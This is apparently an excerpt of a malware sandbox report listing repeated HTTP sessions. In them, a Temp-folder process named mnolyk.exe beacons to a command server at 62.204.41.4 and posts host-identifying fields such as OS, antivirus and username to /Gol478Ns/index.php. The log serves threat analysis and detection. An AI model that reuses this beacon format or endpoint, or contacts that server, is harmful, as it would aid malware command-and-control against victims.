                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      142 | 192.168.2.7 | 49868 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:33.899866104 CET | 588 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:33.962744951 CET | 588 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      143 | 192.168.2.7 | 49869 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:34.178044081 CET | 589 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:34.246464968 CET | 589 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      144 | 192.168.2.7 | 49870 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:34.488373995 CET | 590 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:34.551070929 CET | 590 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      145 | 192.168.2.7 | 49871 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:35.146965981 CET | 591 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:35.213232040 CET | 591 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      146 | 192.168.2.7 | 49872 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:35.424115896 CET | 592 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:35.490262032 CET | 592 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      147 | 192.168.2.7 | 49873 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:36.003659964 CET | 593 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:36.069278955 CET | 593 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      148 | 192.168.2.7 | 49874 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:36.510726929 CET | 594 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:36.575668097 CET | 594 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      149 | 192.168.2.7 | 49875 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:36.759661913 CET | 595 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:36.823663950 CET | 595 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      15 | 192.168.2.7 | 49739 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:01.266268015 CET | 447 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:01.331387043 CET | 447 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      150 | 192.168.2.7 | 49876 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:37.001688957 CET | 596 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:37.067255020 CET | 596 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      151 | 192.168.2.7 | 49877 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:37.241185904 CET | 597 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:37.303318977 CET | 597 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      152 | 192.168.2.7 | 49878 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:37.478497982 CET | 598 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:37.544193983 CET | 598 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      153 | 192.168.2.7 | 49879 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:37.726488113 CET | 599 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:37.790949106 CET | 599 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      154 | 192.168.2.7 | 49880 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:37.960429907 CET | 600 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:38.026807070 CET | 600 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      155 | 192.168.2.7 | 49881 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:38.196455002 CET | 601 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:38.263988972 CET | 601 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      156 | 192.168.2.7 | 49882 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:38.444359064 CET | 602 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:38.507621050 CET | 602 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      157 | 192.168.2.7 | 49883 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:38.704699993 CET | 603 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:38.772583961 CET | 603 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      158 | 192.168.2.7 | 49884 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:38.947005987 CET | 604 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:39.011766911 CET | 604 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      159 | 192.168.2.7 | 49885 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:39.224149942 CET | 605 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
